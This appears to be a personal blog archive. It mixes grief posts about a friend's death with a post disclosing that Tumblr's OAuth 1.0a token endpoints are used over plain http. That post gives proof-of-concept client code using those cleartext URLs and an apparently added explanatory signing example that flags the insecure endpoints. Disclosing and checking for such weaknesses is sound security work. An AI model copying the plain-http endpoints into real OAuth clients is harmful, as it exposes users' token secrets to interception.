I thought that I was going to be happy continuing to stay in the Emerald League, since I found out that one of my friends had passed away on Easter Sunday, but… sometime between yesterday evening and now I’ve moved into the top seven of the Emerald League and am on track to be promoted from it unless someone manages to bump me down several places at the last possible minute (or two, or three). German has become slightly less difficult to learn as I’ve continued to make progress in it, although I continue to be a Rookie in both French and German. I’m pretty sure that I know more French and German than I ever learned of Spanish two courses into high school, but that might have something to do with how horrible the district I graduated from is. With the exception of the most rudimentary things, I haven’t managed to hang onto anything that I “learned” the whole way through secondary school… and I did most of my own teaching myself, to myself, in my off time, because asking any of my teachers for help seemed to grievously inconvenience them. Next year I’m sure people from my graduating class will begin planning what’s supposed to be our twenty-year reunion, and I’ve continued to make it clear that I don’t want to be invited to it because I don’t even want to be contacted by members of my graduating class. It’s actually in my permanent record at the high school that I’m not to be included in any alumni activities or contacted for reunions, or… well, contacted for any reason. The principal put that note in herself, and so far, since graduation, I haven’t been contacted by anyone from my graduating class for almost all of the time I’ve spent as a high school graduate. It is what it is at this point.
Archive of ‘personal’ category
So Jade’s Celebration of Life was held today.
Now everyone who knew her has to… get used to her not being here any more, which is going to suck.
I really wish I didn’t have to make this post.
My Wordless Wednesday post may have alluded to it, but I wanted to make a more official post about it in here — my friend Jade, whose picture I posted on yesterday’s Wordless Wednesday, passed away from complications of cystic fibrosis and her second transplant on what wound up being Easter Sunday. Due to Facebook’s algorithm, I didn’t find out that she had passed until a day and a half after it had happened, and it wasn’t something that I wanted to find out, even though I knew in the back of my mind that the day would come at some point, and that it seemed like she had gotten the same type of rejection in her new set of lungs that she had gotten the time before. She just seemed like she wasn’t doing particularly well leading up to her death, but I did enjoy the posts that her husband made on her behalf letting everyone who knew her know that she was continuing to fight. So it makes sense that he would be the one to write the final post on her behalf, which served to let everyone know that she had passed away. There will be an informal Celebration of Life streamed on her Facebook page for her friends in the coming days, and that’s something that I aim to be present for since I’ve known her for years (since even before her first transplant, in fact!).

Breathe easy, Jade. No one who knew you will ever forget you. Now you get to see your mom again.
Wordless Wednesday: April 12th, 2023

These kids are goofballs and I love them for it.

They’re utter goofballs with each other and I wouldn’t have it any other way. Seriously! I wouldn’t.
Since Tumblr still predictably will not fix this…
I’ve decided to post the proof of concept code up here. My purpose in doing so is to illustrate that my mentioning this exploit was, and always has been, worth the time I’ve taken to mention it, and it is also intended to allow Tumblr users, or those who are at any point considering using Tumblr, to make a more informed decision about blogging on it or trusting the site with any of their potentially sensitive information.
The code below uses the Python requests-oauthlib library to walk through Tumblr’s OAuth 1.0a flow: it obtains a temporary request token, sends the user to the authorize page, exchanges the user’s verifier for a permanent access token, and then calls the API with that token. The security-relevant point is in the endpoint URLs. The request-token, authorize and access-token URLs are written as plain http://, so the temporary and permanent token secrets that those endpoints return travel in clear text and can be read by anyone on the network path between the client and Tumblr. The OAuth 1.0a signature itself never carries the consumer secret or token secret, so what an observer of unencrypted traffic gets is the token responses, not the signing key; but a token and token secret are the user-side half of everything needed to sign requests as that user.
The following proof of concept code walks through the flow against those endpoints:
import requests
from requests_oauthlib import OAuth1
from urllib.parse import parse_qs

# Set your OAuth consumer key and secret (issued when you register an app with Tumblr)
CONSUMER_KEY = 'your_consumer_key'
CONSUMER_SECRET = 'your_consumer_secret'

# Set the Tumblr API endpoints. Note that these are plain http://, so the
# request and response bodies, including the token secrets, are not encrypted in transit.
REQUEST_TOKEN_URL = 'http://www.tumblr.com/oauth/request_token'
AUTHORIZE_URL = 'http://www.tumblr.com/oauth/authorize'
ACCESS_TOKEN_URL = 'http://www.tumblr.com/oauth/access_token'

def parse_token_response(body):
    # Token responses are form-encoded (oauth_token=...&oauth_token_secret=...&...);
    # parse them by field name rather than by position.
    fields = parse_qs(body)
    return fields['oauth_token'][0], fields['oauth_token_secret'][0]

# Step 1: send a request for a temporary OAuth token
oauth = OAuth1(CONSUMER_KEY, client_secret=CONSUMER_SECRET)
response = requests.post(url=REQUEST_TOKEN_URL, auth=oauth)
response.raise_for_status()
oauth_token, oauth_token_secret = parse_token_response(response.text)

# Step 2: direct the user to authorize the app
authorize_url = AUTHORIZE_URL + '?oauth_token=' + oauth_token
print('Please authorize the app at this URL: ' + authorize_url)
oauth_verifier = input('Enter the verification code: ')

# Step 3: exchange the temporary token for a permanent token
oauth = OAuth1(CONSUMER_KEY,
               client_secret=CONSUMER_SECRET,
               resource_owner_key=oauth_token,
               resource_owner_secret=oauth_token_secret,
               verifier=oauth_verifier)
response = requests.post(url=ACCESS_TOKEN_URL, auth=oauth)
response.raise_for_status()
oauth_token, oauth_token_secret = parse_token_response(response.text)

# Step 4: use the permanent token and secret to make authenticated API requests
oauth = OAuth1(CONSUMER_KEY,
               client_secret=CONSUMER_SECRET,
               resource_owner_key=oauth_token,
               resource_owner_secret=oauth_token_secret)
response = requests.get(url='https://api.tumblr.com/v2/user/info', auth=oauth)
print(response.text)
In summary, anyone who can intercept these unencrypted token exchanges could read the access token and its secret and, from a client holding the same consumer credentials, sign requests that read sensitive information or modify data on behalf of the legitimate user. Tumblr serves the same OAuth endpoints over HTTPS, so a client should use the https:// form of every URL in the flow, not only for the final API call.
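To make the point about clear-text transport concrete, here is an added example (not code from the original post or from Tumblr) that implements OAuth 1.0a HMAC-SHA1 signing with the Python standard library only, shows what a signed request actually puts on the wire, and flags the plain-http endpoints from the proof of concept above. The request values are the published test vector from OAuth Core 1.0 Appendix A (photos.example.net); the POC_ENDPOINTS list repeats the PoC’s URLs, and the function names are my own.

```python
"""Added example (not the original post's code): an OAuth 1.0a HMAC-SHA1
signer written with the standard library only, plus two small checks.
It shows what an OAuth 1.0a request puts on the wire and what it does not,
and flags the plain-http endpoints used by the proof of concept above.
Request values are the test vector from OAuth Core 1.0 Appendix A
(photos.example.net); the Tumblr URLs are the PoC's own."""
import base64
import hashlib
import hmac
from urllib.parse import parse_qs, quote, urlsplit, urlunsplit

# Endpoint URLs exactly as they appear in the proof of concept above.
POC_ENDPOINTS = [
    "http://www.tumblr.com/oauth/request_token",
    "http://www.tumblr.com/oauth/authorize",
    "http://www.tumblr.com/oauth/access_token",
]


def pct(value):
    """RFC 5849 section 3.6 percent-encoding: only A-Z a-z 0-9 - . _ ~ stay unescaped."""
    return quote(str(value), safe="-._~")


def signature_base_string(method, url, params):
    """Build the string that gets signed (RFC 5849 section 3.4.1)."""
    parts = urlsplit(url)
    scheme = parts.scheme.lower()
    netloc = parts.netloc.lower()
    # Default ports are dropped from the base string URI.
    if (scheme, parts.port) in (("http", 80), ("https", 443)):
        netloc = parts.hostname
    base_url = urlunsplit((scheme, netloc, parts.path, "", ""))
    # Every parameter (query plus oauth_*) is encoded, then sorted by key, then value.
    pairs = sorted((pct(k), pct(v)) for k, v in params)
    normalized = "&".join(f"{k}={v}" for k, v in pairs)
    return "&".join([method.upper(), pct(base_url), pct(normalized)])


def hmac_sha1(base, consumer_secret, token_secret=""):
    """Signing key is consumer secret and token secret joined by '&'; the key itself never goes in the request."""
    key = f"{pct(consumer_secret)}&{pct(token_secret)}".encode()
    digest = hmac.new(key, base.encode(), hashlib.sha1).digest()
    return base64.b64encode(digest).decode()


def sign_request(method, url, query, consumer_key, consumer_secret,
                 token, token_secret, nonce, timestamp):
    """Return the base string, signature and Authorization header for one request."""
    oauth = {
        "oauth_consumer_key": consumer_key,
        "oauth_token": token,
        "oauth_signature_method": "HMAC-SHA1",
        "oauth_timestamp": str(timestamp),
        "oauth_nonce": nonce,
        "oauth_version": "1.0",
    }
    base = signature_base_string(method, url, list(oauth.items()) + list(query.items()))
    oauth["oauth_signature"] = hmac_sha1(base, consumer_secret, token_secret)
    header = "OAuth " + ", ".join(f'{k}="{pct(v)}"' for k, v in oauth.items())
    return {"base_string": base, "signature": oauth["oauth_signature"], "header": header}


def cleartext_endpoints(urls):
    """Endpoints that would carry the token handshake unencrypted."""
    return [u for u in urls if urlsplit(u).scheme.lower() != "https"]


def parse_token_response(body):
    """Parse a form-encoded token response by field name, not by position."""
    return {k: v[0] for k, v in parse_qs(body, strict_parsing=True).items()}


if __name__ == "__main__":
    signed = sign_request(
        "GET", "http://photos.example.net/photos", {"file": "vacation.jpg", "size": "original"},
        consumer_key="dpf43f3p2l4k3l03", consumer_secret="kd94hf93k423kf44",
        token="nnch734d00sl2jdk", token_secret="pfkkdhi9sl3r4s00",
        nonce="kllo9940pd9333jh", timestamp=1191242096)
    print(signed["header"])
    # Over plain http the header above is readable but carries no secret; what a
    # sniffer does get are the secrets inside token responses (constructed sample):
    print(parse_token_response("oauth_token=abc&oauth_token_secret=s3cr3t&oauth_callback_confirmed=true"))
    print("Unencrypted in the PoC:", cleartext_endpoints(POC_ENDPOINTS))
```

Run it and compare the header against the request shown in Appendix A of the OAuth Core 1.0 spec: the consumer key, token, nonce, timestamp and signature are all visible, the two secrets are not. That is why the exposure in the PoC comes from the request-token and access-token responses sent over http://, which hand the token secret to anyone on the path, and why `cleartext_endpoints` is the check to run on any OAuth client configuration before shipping it.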